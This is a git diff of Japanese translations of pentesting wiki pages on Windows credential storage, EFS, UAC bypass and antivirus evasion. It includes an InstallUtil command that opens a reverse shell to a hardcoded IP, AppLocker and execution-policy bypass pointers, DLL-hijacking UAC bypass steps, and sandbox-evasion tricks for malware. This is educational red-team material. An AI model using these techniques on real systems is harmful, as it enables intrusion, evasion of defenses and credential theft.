+- [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)や[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)を使用して、**任意のプロセスでPowershell**コードを**実行し、AppLockerを回避する**ことができます。詳細については、[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)を確認してください。
 
 ## 資格情報の保存
 
@@ -52,7 +52,7 @@ C:\windows\tracing
 **LSA**はローカルの**セキュリティポリシー**（パスワードポリシー、ユーザー権限など）、**認証**、**アクセス トークン**を管理します。\
 LSAは、**SAM**ファイル内の提供された資格情報を**確認**し（ローカルログイン用）、ドメインユーザーを認証するために**ドメインコントローラー**と**通信**します。
 
-**資格情報**は**プロセスLSASS**内に**保存**されます：Kerberosチケット、NTおよびLMのハッシュ、簡単に復号化できるパスワード。
+**資格情報**は**プロセスLSASS**内に**保存**されます：Kerberosチケット、NTおよびLMのハッシュ、簡単に復号化可能なパスワード。
 
 ### LSAシークレット
 
@@ -69,11 +69,11 @@ LSAはディスクにいくつかの資格情報を保存することがあり
 
 ## ディフェンダー
 
-[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender)は、Windows 10およびWindows 11、そしてWindows Serverのバージョンで利用可能なアンチウイルスです。**一般的なペンテストツール**（例：**`WinPEAS`**）を**ブロック**します。しかし、これらの保護を**回避する方法**があります。
+[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender)は、Windows 10およびWindows 11、Windows Serverのバージョンで利用可能なアンチウイルスです。**一般的なペンテストツール（例：**`WinPEAS`**）を**ブロック**します。しかし、これらの保護を**回避する方法**があります。
 
 ### チェック
 
-**Defender**の**状態**を確認するには、PSコマンドレット**`Get-MpComputerStatus`**を実行できます（**`RealTimeProtectionEnabled`**の値を確認して、アクティブかどうかを知る）：
+**Defender**の**ステータス**を確認するには、PSコマンドレット**`Get-MpComputerStatus`**を実行できます（**`RealTimeProtectionEnabled`**の値を確認して、アクティブかどうかを知る）：
 
 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
 
@@ -103,31 +103,32 @@ sc query windefend
 ```
 ## Encrypted File System (EFS)
 
-EFSは、**対称鍵**である**ファイル暗号化鍵（FEK）**を使用してファイルを暗号化します。この鍵はユーザーの**公開鍵**で暗号化され、暗号化されたファイルの$EFS **代替データストリーム**内に保存されます。復号が必要な場合、ユーザーのデジタル証明書の対応する**秘密鍵**が$EFSストリームからFEKを復号するために使用されます。詳細は[here](https://en.wikipedia.org/wiki/Encrypting_File_System)で確認できます。
+EFSは、**対称鍵**である**ファイル暗号化鍵（FEK）**を使用してファイルを暗号化します。この鍵はユーザーの**公開鍵**で暗号化され、暗号化されたファイルの$EFS **代替データストリーム**内に保存されます。復号が必要な場合、ユーザーのデジタル証明書の対応する**秘密鍵**を使用して$EFSストリームからFEKを復号します。詳細は[here](https://en.wikipedia.org/wiki/Encrypting_File_System)で確認できます。
 
 **ユーザーの操作なしでの復号シナリオ**には以下が含まれます：
 
 - ファイルやフォルダーが[FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table)のような非EFSファイルシステムに移動されると、自動的に復号されます。
 - SMB/CIFSプロトコルを介してネットワーク上で送信された暗号化ファイルは、送信前に復号されます。
 
-この暗号化方法は、所有者に対して暗号化ファイルへの**透過的アクセス**を提供します。ただし、所有者のパスワードを変更してログインするだけでは復号は許可されません。
+この暗号化方法は、所有者に対して暗号化ファイルへの**透過的アクセス**を提供します。ただし、所有者のパスワードを単に変更してログインするだけでは復号は許可されません。
 
 **主なポイント**：
 
 - EFSは、ユーザーの公開鍵で暗号化された対称FEKを使用します。
-- 復号には、ユーザーの秘密鍵を使用してFEKにアクセスします。
-- FAT32へのコピーやネットワーク送信など、特定の条件下で自動復号が行われます。
+- 復号にはユーザーの秘密鍵を使用してFEKにアクセスします。
+- FAT32へのコピーやネットワーク送信など、特定の条件下で自動的に復号が行われます。
 - 暗号化ファイルは、追加の手順なしで所有者がアクセスできます。
 
 ### EFS情報の確認
 
 **ユーザー**がこの**サービス**を**使用**したかどうかを確認するには、このパスが存在するか確認します：`C:\users\<username>\appdata\roaming\Microsoft\Protect`
 
-ファイルへの**アクセス**権を持つ**誰**かを確認するには、`cipher /c \<file>\`を使用します。フォルダー内で`cipher /e`および`cipher /d`を使用して、すべてのファイルを**暗号化**および**復号**することもできます。
+ファイルへの**アクセス**権を確認するには、cipher /c \<file>\を使用します。\
+フォルダー内で`cipher /e`および`cipher /d`を使用して、すべてのファイルを**暗号化**および**復号**することもできます。
 
 ### EFSファイルの復号
 
-#### 権限のあるシステムであること
+#### 権限システムであること
 
 この方法では、**被害者ユーザー**がホスト内で**プロセス**を**実行**している必要があります。その場合、`meterpreter`セッションを使用してユーザーのプロセスのトークンを偽装することができます（`incognito`の`impersonate_token`）。または、ユーザーのプロセスに`migrate`することもできます。
 
@@ -137,15 +138,15 @@ EFSは、**対称鍵**である**ファイル暗号化鍵（FEK）**を使用し
 
 ## Group Managed Service Accounts (gMSA)
 
-Microsoftは、ITインフラストラクチャにおけるサービスアカウントの管理を簡素化するために**グループ管理サービスアカウント（gMSA）**を開発しました。従来のサービスアカウントは「**パスワードは永遠に期限切れにならない**」設定が有効であることが多いのに対し、gMSAはより安全で管理しやすいソリューションを提供します：
+Microsoftは、ITインフラストラクチャにおけるサービスアカウントの管理を簡素化するために**グループ管理サービスアカウント（gMSA）**を開発しました。従来のサービスアカウントは「**パスワードは期限切れにならない**」設定が有効であることが多いのに対し、gMSAはより安全で管理しやすいソリューションを提供します：
 
 - **自動パスワード管理**：gMSAは、ドメインまたはコンピュータポリシーに従って自動的に変更される複雑な240文字のパスワードを使用します。このプロセスはMicrosoftのキー配布サービス（KDC）によって処理され、手動でのパスワード更新が不要になります。
 - **強化されたセキュリティ**：これらのアカウントはロックアウトに対して免疫があり、対話的ログインには使用できないため、セキュリティが向上します。
 - **複数ホストのサポート**：gMSAは複数のホストで共有できるため、複数のサーバーで実行されるサービスに最適です。
 - **スケジュールされたタスクの実行能力**：管理されたサービスアカウントとは異なり、gMSAはスケジュールされたタスクの実行をサポートします。
-- **簡素化されたSPN管理**：システムは、コンピュータのsAMaccountの詳細やDNS名に変更があった場合に自動的にサービスプリンシパル名（SPN）を更新し、SPN管理を簡素化します。
+- **簡素化されたSPN管理**：コンピュータのsAMaccountの詳細やDNS名に変更があった場合、システムは自動的にサービスプリンシパル名（SPN）を更新し、SPN管理を簡素化します。
 
-gMSAのパスワードはLDAPプロパティ_**msDS-ManagedPassword**_に保存され、ドメインコントローラー（DC）によって30日ごとに自動的にリセットされます。このパスワードは、[MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e)として知られる暗号化データブロブであり、認可された管理者とgMSAがインストールされているサーバーのみが取得できるため、安全な環境が確保されます。この情報にアクセスするには、LDAPSのような安全な接続が必要であるか、接続は「Sealing & Secure」で認証される必要があります。
+gMSAのパスワードはLDAPプロパティ_**msDS-ManagedPassword**_に保存され、ドメインコントローラー（DC）によって30日ごとに自動的にリセットされます。このパスワードは、[MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e)として知られる暗号化データブロブであり、認可された管理者とgMSAがインストールされているサーバーのみが取得できるため、安全な環境が確保されます。この情報にアクセスするには、LDAPSのような安全な接続が必要であるか、接続が「Sealing & Secure」で認証されている必要があります。
 
 ![https://cube0x0.github.io/Relaying-for-gMSA/](../../images/asd1.png)
 
@@ -155,7 +156,7 @@ gMSAのパスワードはLDAPプロパティ_**msDS-ManagedPassword**_に保存
 ```
 [**この投稿で詳細情報を見つける**](https://cube0x0.github.io/Relaying-for-gMSA/)
 
-また、**gMSA**の**パスワード**を**読み取る**ための**NTLMリレー攻撃**を実行する方法については、この[ウェブページ](https://cube0x0.github.io/Relaying-for-gMSA/)を確認してください。
+また、**gMSA**の**パスワード**を**読み取る**ための**NTLMリレー攻撃**を実行する方法についての[ウェブページ](https://cube0x0.github.io/Relaying-for-gMSA/)も確認してください。
 
 ## LAPS
 
@@ -190,11 +191,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
 ```
-[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) または [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) を使用して、任意のプロセスで **Powershell** コードを実行し、制約モードを回避できます。詳細については、[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode) を確認してください。
+[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) または [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) を使用して、**Powershell** コードを任意のプロセスで実行し、制約モードを回避できます。詳細については、[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode) を確認してください。
 
 ## PS 実行ポリシー
 
-デフォルトでは **restricted** に設定されています。このポリシーを回避する主な方法：
+デフォルトでは、**restricted** に設定されています。このポリシーを回避する主な方法：
 ```powershell
 1º Just copy and paste inside the interactive PS console
 2º Read en Exec
@@ -228,7 +229,7 @@ SSPIは、通信を希望する2台のマシンに適切なプロトコルを見
 - %windir%\Windows\System32\kerberos.dll
 - **NTLMv1** および **NTLMv2**: 互換性の理由
 - %windir%\Windows\System32\msv1_0.dll
-- **Digest**: WebサーバーとLDAP、MD5ハッシュ形式のパスワード
+- **Digest**: WebサーバーおよびLDAP、MD5ハッシュ形式のパスワード
 - %windir%\Windows\System32\Wdigest.dll
 - **Schannel**: SSLおよびTLS
 - %windir%\Windows\System32\Schannel.dll
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
index 64e6896c8..9e40dac18 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
@@ -4,9 +4,9 @@
 
 ## UAC
 
-[ユーザーアカウント制御 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) は、**昇格された活動のための同意プロンプト**を有効にする機能です。アプリケーションには異なる `integrity` レベルがあり、**高いレベル**のプログラムは、**システムを危険にさらす可能性のある**タスクを実行できます。UACが有効になっている場合、アプリケーションやタスクは常に**非管理者アカウントのセキュリティコンテキストの下で実行され**、管理者が明示的にこれらのアプリケーション/タスクに管理者レベルのアクセスを許可しない限り、システムを実行することはできません。これは、管理者が意図しない変更から保護される便利な機能ですが、セキュリティ境界とは見なされません。
+[ユーザーアカウント制御 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) は、**昇格された活動のための同意プロンプト**を有効にする機能です。アプリケーションには異なる `integrity` レベルがあり、**高いレベル**のプログラムは、**システムを危険にさらす可能性のあるタスク**を実行できます。UACが有効になっている場合、アプリケーションやタスクは常に**非管理者アカウントのセキュリティコンテキストの下で実行**され、管理者が明示的にこれらのアプリケーション/タスクに管理者レベルのアクセスを許可しない限り、システムを実行することはできません。これは、管理者が意図しない変更から保護される便利な機能ですが、セキュリティ境界とは見なされません。
 
-インテグリティレベルに関する詳細情報は次のとおりです：
+インテグリティレベルに関する詳細情報:
 
 {{#ref}}
 ../windows-local-privilege-escalation/integrity-levels.md
@@ -20,8 +20,8 @@ UACが有効な場合、管理者ユーザーには2つのトークンが与え
 | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
 | [ユーザーアカウント制御：組み込みの管理者アカウントの管理者承認モード](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | 無効                                                       |
 | [ユーザーアカウント制御：UIAccessアプリケーションがセキュアデスクトップを使用せずに昇格を要求できるようにする](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | 無効                                                       |
-| [ユーザーアカウント制御：管理者の管理者承認モードにおける昇格プロンプトの動作](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 非Windowsバイナリに対して同意を求めるプロンプト            |
-| [ユーザーアカウント制御：標準ユーザーの昇格プロンプトの動作](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | セキュアデスクトップでの資格情報を求めるプロンプト         |
+| [ユーザーアカウント制御：管理者の昇格プロンプトの動作（管理者承認モード）](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 非Windowsバイナリに対して同意を求めるプロンプト            |
+| [ユーザーアカウント制御：標準ユーザーの昇格プロンプトの動作](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | セキュアデスクトップでの資格情報を求めるプロンプト        |
 | [ユーザーアカウント制御：アプリケーションのインストールを検出し、昇格を要求する](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | 有効（ホームのデフォルト）無効（エンタープライズのデフォルト） |
 | [ユーザーアカウント制御：署名され、検証された実行可能ファイルのみを昇格させる](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | 無効                                                       |
 | [ユーザーアカウント制御：セキュアな場所にインストールされたUIAccessアプリケーションのみを昇格させる](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | 有効                                                       |
@@ -31,9 +31,9 @@ UACが有効な場合、管理者ユーザーには2つのトークンが与え
 
 ### UACバイパス理論
 
-一部のプログラムは、**ユーザーが** **管理者グループに属している**場合に**自動的に昇格**されます。これらのバイナリには、_**Manifests**_ 内に _**autoElevate**_ オプションが _**True**_ の値で含まれています。バイナリは、**Microsoftによって署名されている**必要があります。
+一部のプログラムは、**ユーザーが** **管理者グループに属している場合**、**自動的に自動昇格**されます。これらのバイナリには、_**Manifests**_ 内に _**autoElevate**_ オプションが _**True**_ の値で含まれています。バイナリは、**Microsoftによって署名されている必要があります**。
 
-次に、**UAC**を**バイパス**するために（**中**のインテグリティレベルから**高**に昇格するために）、一部の攻撃者はこの種のバイナリを使用して**任意のコードを実行**します。なぜなら、それは**高いインテグリティプロセス**から実行されるからです。
+次に、**UAC**を**バイパス**するために（**中**のインテグリティレベルから**高**に昇格する）、一部の攻撃者はこの種のバイナリを使用して**任意のコードを実行**します。なぜなら、それは**高いインテグリティプロセス**から実行されるからです。
 
 バイナリの_**Manifest**_を確認するには、Sysinternalsのツール_**sigcheck.exe**_を使用できます。また、_Process Explorer_や_Sysinternals_の_Process Monitor_を使用してプロセスの**インテグリティレベル**を確認できます。
 
@@ -57,22 +57,22 @@ ConsentPromptBehaviorAdmin    REG_DWORD    0x5
 ```
 - **`0`** の場合、UACはプロンプトを表示しません（**無効**のように）
 - **`1`** の場合、管理者はバイナリを高い権限で実行するために**ユーザー名とパスワード**を求められます（セキュアデスクトップ上で）
-- **`2`** の場合（**常に通知**）、UACは管理者が高い権限で何かを実行しようとするたびに常に確認を求めます（セキュアデスクトップ上で）
+- **`2`** （**常に通知する**）の場合、UACは管理者が高い権限で何かを実行しようとするたびに常に確認を求めます（セキュアデスクトップ上で）
 - **`3`** の場合、`1` と同様ですが、セキュアデスクトップ上で必要ではありません
 - **`4`** の場合、`2` と同様ですが、セキュアデスクトップ上で必要ではありません
-- **`5`** の場合（**デフォルト**）、非Windowsバイナリを高い権限で実行するために管理者に確認を求めます
+- **`5`** （**デフォルト**）の場合、管理者に非Windowsバイナリを高い権限で実行するための確認を求めます
 
 次に、**`LocalAccountTokenFilterPolicy`** の値を確認する必要があります。\
-値が **`0`** の場合、**RID 500** ユーザー（**ビルトイン管理者**）のみがUACなしで**管理タスク**を実行できます。値が `1` の場合、**「Administrators」** グループ内のすべてのアカウントがそれを実行できます。
+値が **`0`** の場合、**RID 500** ユーザー（**組み込みの管理者**）のみがUACなしで**管理タスク**を実行できます。値が `1` の場合、**「Administrators」** グループ内のすべてのアカウントがそれを実行できます。
 
 最後に、キー **`FilterAdministratorToken`** の値を確認します。\
-**`0`**（デフォルト）の場合、**ビルトイン管理者アカウントは**リモート管理タスクを実行できます。**`1`** の場合、ビルトインアカウント管理者は**リモート管理タスクを実行できません**が、`LocalAccountTokenFilterPolicy` が `1` に設定されている場合を除きます。
+**`0`**（デフォルト）の場合、**組み込みの管理者アカウントは**リモート管理タスクを実行できます。**`1`** の場合、組み込みの管理者アカウントは**リモート管理タスクを実行できません**が、`LocalAccountTokenFilterPolicy` が `1` に設定されている場合を除きます。
 
 #### 概要
 
 - `EnableLUA=0` または **存在しない**場合、**誰に対してもUACなし**
 - `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=1`** の場合、誰に対してもUACなし
-- `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=0`** かつ `FilterAdministratorToken=0` の場合、RID 500（ビルトイン管理者）に対してUACなし
+- `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=0`** かつ `FilterAdministratorToken=0` の場合、RID 500（組み込みの管理者）に対してUACなし
 - `EnableLua=1` かつ **`LocalAccountTokenFilterPolicy=0`** かつ `FilterAdministratorToken=1` の場合、全員に対してUACあり
 
 このすべての情報は、**metasploit** モジュール `post/windows/gather/win_privs` を使用して収集できます。
@@ -89,7 +89,7 @@ whoami /groups | findstr Level
 
 UACバイパスは以下の状況で必要です: **UACが有効で、プロセスが中程度の整合性コンテキストで実行されており、ユーザーが管理者グループに属している場合**。
 
-UACが**最高のセキュリティレベル（常に）**に設定されている場合、UACをバイパスするのは**他のレベル（デフォルト）の場合よりもはるかに難しい**ことを言及することが重要です。
+UACが**最高のセキュリティレベル（常に）**に設定されている場合、他のレベル（デフォルト）の場合よりもUACをバイパスするのが**はるかに難しい**ことを言及することが重要です。
 
 ### UAC無効
 
@@ -154,7 +154,7 @@ Major  Minor  Build  Revision
 
 #### さらなるUACバイパス
 
-**ここで使用されるすべての技術は、AUCをバイパスするために** **フルインタラクティブシェル** **を必要とします**（一般的なnc.exeシェルでは不十分です）。
+**ここで使用されるすべての技術は、AUCをバイパスするために** **完全なインタラクティブシェル** **を必要とします**（一般的なnc.exeシェルでは不十分です）。
 
 **meterpreter**セッションを使用して取得できます。**Session**値が**1**に等しい**プロセス**に移行します：
 
@@ -166,19 +166,19 @@ Major  Minor  Build  Revision
 
 **GUIにアクセスできる場合、UACプロンプトが表示されたときにそれを受け入れるだけで済みます**。実際にはバイパスは必要ありません。したがって、GUIにアクセスすることでUACをバイパスできます。
 
-さらに、誰かが使用していたGUIセッション（おそらくRDP経由）を取得した場合、**管理者として実行されるいくつかのツール**があり、そこから**cmd**を例えば**管理者として**直接実行でき、再度UACによるプロンプトが表示されることはありません。 [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)のように。これは少し**ステルス**になるかもしれません。
+さらに、誰かが使用していたGUIセッション（おそらくRDP経由）を取得すると、**管理者として実行されるいくつかのツール**があり、そこから**cmd**を例えば**管理者として**直接実行でき、再度UACによるプロンプトが表示されることはありません。これは少し**ステルス**かもしれません。
 
 ### 騒がしいブルートフォースUACバイパス
 
-騒がしいことを気にしないのであれば、常に[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)のようなものを**実行することができます**。これは**ユーザーが受け入れるまで権限を昇格するように要求します**。
+騒がしいことを気にしないのであれば、常に**[**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)**のようなものを**実行して、ユーザーが受け入れるまで権限を昇格するように要求することができます**。
 
 ### 自分自身のバイパス - 基本的なUACバイパス手法
 
-**UACME**を見てみると、**ほとんどのUACバイパスはDLLハイジャックの脆弱性を悪用しています**（主に悪意のあるdllを_C:\Windows\System32_に書き込むこと）。 [DLLハイジャックの脆弱性を見つける方法を学ぶには、これを読んでください](../windows-local-privilege-escalation/dll-hijacking/)。
+**UACME**を見てみると、**ほとんどのUACバイパスはDLLハイジャックの脆弱性を悪用している**ことに気付くでしょう（主に悪意のあるdllを_C:\Windows\System32_に書き込むこと）。[DLLハイジャックの脆弱性を見つける方法を学ぶにはこれを読んでください](../windows-local-privilege-escalation/dll-hijacking/)。
 
 1. **自動昇格**するバイナリを見つけます（実行時に高い整合性レベルで実行されることを確認します）。
 2. procmonを使用して、**DLLハイジャック**に脆弱な可能性のある"**NAME NOT FOUND**"イベントを見つけます。
-3. おそらく、**書き込み権限がない**いくつかの**保護されたパス**（C:\Windows\System32など）内にDLLを**書き込む**必要があります。これをバイパスするには、次の方法を使用できます：
+3. おそらく、**書き込み権限がない**いくつかの**保護されたパス**（C:\Windows\System32など）内にDLLを**書き込む**必要があります。これをバイパスするには：
    1. **wusa.exe**：Windows 7、8、8.1。CABファイルの内容を保護されたパス内に抽出することができます（このツールは高い整合性レベルから実行されるため）。
    2. **IFileOperation**：Windows 10。
 4. 保護されたパス内にDLLをコピーし、脆弱で自動昇格されたバイナリを実行するための**スクリプト**を準備します。
diff --git a/src/windows-hardening/av-bypass.md b/src/windows-hardening/av-bypass.md
index a83169a32..54d839cad 100644
--- a/src/windows-hardening/av-bypass.md
+++ b/src/windows-hardening/av-bypass.md
@@ -22,22 +22,22 @@
 
 - **カスタムツール**
 
-独自のツールを開発すれば、既知の悪意のあるシグネチャは存在しませんが、これには多くの時間と労力がかかります。
+独自のツールを開発すれば、既知の悪いシグネチャは存在しませんが、これには多くの時間と労力がかかります。
 
 > [!NOTE]
-> Windows Defenderの静的検出に対抗する良い方法は、[ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)です。これは基本的にファイルを複数のセグメントに分割し、Defenderにそれぞれを個別にスキャンさせることで、バイナリ内のフラグが立てられた文字列やバイトを正確に教えてくれます。
+> Windows Defenderの静的検出に対して確認する良い方法は[ThreatCheck](https://github.com/rasta-mouse/ThreatCheck)です。これは基本的にファイルを複数のセグメントに分割し、Defenderにそれぞれを個別にスキャンさせることで、バイナリ内のフラグが立てられた文字列やバイトを正確に教えてくれます。
 
-実践的なAV回避に関するこの[YouTubeプレイリスト](https://www.youtube.com/playlist?list=PLj05gPj8rk_pkb12mDe4PgYZ5qPxhGKGf)をぜひチェックしてください。
+実践的なAV回避に関するこの[YouTubeプレイリスト](https://www.youtube.com/playlist?list=PLj05gPj8rk_pkb12mDe4PgYZ5qPxhGKGf)をぜひチェックすることをお勧めします。
 
 ### **動的分析**
 
-動的分析は、AVがバイナリをサンドボックス内で実行し、悪意のある活動を監視することです（例：ブラウザのパスワードを復号化して読み取ろうとする、LSASSのミニダンプを実行するなど）。この部分は扱うのが少し難しいことがありますが、サンドボックスを回避するためにできることはいくつかあります。
+動的分析は、AVがバイナリをサンドボックス内で実行し、悪意のある活動を監視することです（例：ブラウザのパスワードを復号化して読み取ろうとする、LSASSのミニダンプを実行するなど）。この部分は扱いが少し難しいことがありますが、サンドボックスを回避するためにできることはいくつかあります。
 
 - **実行前のスリープ** 実装方法によっては、AVの動的分析を回避するための素晴らしい方法になることがあります。AVはユーザーの作業フローを中断しないようにファイルをスキャンするための時間が非常に短いため、長いスリープを使用するとバイナリの分析を妨げることができます。ただし、多くのAVのサンドボックスは、実装方法によってはスリープをスキップすることができます。
-- **マシンのリソースをチェック** 通常、サンドボックスは扱えるリソースが非常に少ない（例：< 2GB RAM）ため、そうでなければユーザーのマシンを遅くする可能性があります。ここでは非常にクリエイティブになることもできます。たとえば、CPUの温度やファンの速度をチェックすることで、すべてがサンドボックスに実装されているわけではありません。
-- **マシン固有のチェック** "contoso.local"ドメインに参加しているユーザーのワークステーションをターゲットにしたい場合、コンピュータのドメインをチェックして指定したものと一致するか確認できます。一致しない場合、プログラムを終了させることができます。
+- **マシンのリソースを確認** 通常、サンドボックスは扱えるリソースが非常に少ない（例：< 2GB RAM）ため、そうでなければユーザーのマシンを遅くする可能性があります。ここでは非常にクリエイティブになることもできます。たとえば、CPUの温度やファンの速度を確認することで、すべてがサンドボックスに実装されているわけではありません。
+- **マシン固有のチェック** "contoso.local"ドメインに参加しているユーザーをターゲットにしたい場合は、コンピュータのドメインをチェックして指定したものと一致するか確認できます。一致しない場合は、プログラムを終了させることができます。
 
-Microsoft Defenderのサンドボックスのコンピュータ名はHAL9THであるため、爆発前にマルウェア内でコンピュータ名をチェックできます。名前がHAL9THと一致する場合、Defenderのサンドボックス内にいることを意味するため、プログラムを終了させることができます。
+Microsoft Defenderのサンドボックスのコンピュータ名はHAL9THであるため、爆発前にマルウェア内でコンピュータ名を確認できます。名前がHAL9THと一致する場合、Defenderのサンドボックス内にいることを意味するため、プログラムを終了させることができます。
 
 <figure><img src="../images/image (209).png" alt=""><figcaption><p>出典: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
 
@@ -47,28 +47,28 @@ Microsoft Defenderのサンドボックスのコンピュータ名はHAL9THで
 
 この投稿で以前に述べたように、**公開ツール**は最終的に**検出される**ため、あなたは自分自身に何かを尋ねるべきです：
 
-たとえば、LSASSをダンプしたい場合、**本当にmimikatzを使用する必要がありますか**？それとも、LSASSをダンプする別のあまり知られていないプロジェクトを使用できますか。
+たとえば、LSASSをダンプしたい場合、**本当にmimikatzを使用する必要がありますか**？それとも、あまり知られていない別のプロジェクトを使用してLSASSをダンプすることができますか。
 
-正しい答えはおそらく後者です。mimikatzを例に取ると、これはおそらくAVやEDRによって最もフラグが立てられたマルウェアの一つであり、プロジェクト自体は非常にクールですが、AVを回避するためにそれを扱うのは悪夢のようなものです。したがって、達成しようとしていることの代替手段を探してください。
+正しい答えはおそらく後者です。mimikatzを例に取ると、これはおそらくAVやEDRによって最もフラグが立てられたマルウェアの一つであり、プロジェクト自体は非常にクールですが、AVを回避するためにそれを扱うのは悪夢です。したがって、達成しようとしていることの代替手段を探してください。
 
 > [!NOTE]
 > 回避のためにペイロードを変更する際は、Defenderで**自動サンプル送信をオフにする**ことを確認し、長期的に回避を達成することが目標である場合は、**VIRUSTOTALにアップロードしないでください**。特定のAVによってペイロードが検出されるかどうかを確認したい場合は、VMにインストールし、自動サンプル送信をオフにし、結果に満足するまでそこでテストしてください。
 
 ## EXEとDLL
 
-可能な限り、常に**回避のためにDLLを使用することを優先してください**。私の経験では、DLLファイルは通常**はるかに検出されにくく**、分析されにくいため、場合によっては検出を回避するための非常にシンプルなトリックです（もちろん、ペイロードがDLLとして実行される方法がある場合）。
+可能な限り、常に**回避のためにDLLを使用することを優先してください**。私の経験では、DLLファイルは通常**はるかに検出されにくく**、分析されにくいため、場合によっては検出を回避するための非常に簡単なトリックです（もちろん、ペイロードがDLLとして実行される方法がある場合）。
 
 この画像に示されているように、HavocのDLLペイロードはantiscan.meでの検出率が4/26であるのに対し、EXEペイロードは7/26の検出率です。
 
 <figure><img src="../images/image (1130).png" alt=""><figcaption><p>antiscan.meでの通常のHavoc EXEペイロードと通常のHavoc DLLの比較</p></figcaption></figure>
 
-ここでは、DLLファイルを使用してよりステルス性を高めるためのいくつかのトリックを紹介します。
+ここでは、DLLファイルを使用してよりステルス性を高めるためのいくつかのトリックを示します。
 
 ## DLLサイドローディングとプロキシ
 
 **DLLサイドローディング**は、ローダーによって使用されるDLL検索順序を利用し、被害者アプリケーションと悪意のあるペイロードを並べて配置します。
 
-DLLサイドローディングに脆弱なプログラムをチェックするには、[Siofra](https://github.com/Cybereason/siofra)と次のPowerShellスクリプトを使用できます：
+DLLサイドローディングに脆弱なプログラムを確認するには、[Siofra](https://github.com/Cybereason/siofra)と次のPowerShellスクリプトを使用できます：
 ```powershell
 Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
 $binarytoCheck = "C:\Program Files\" + $_
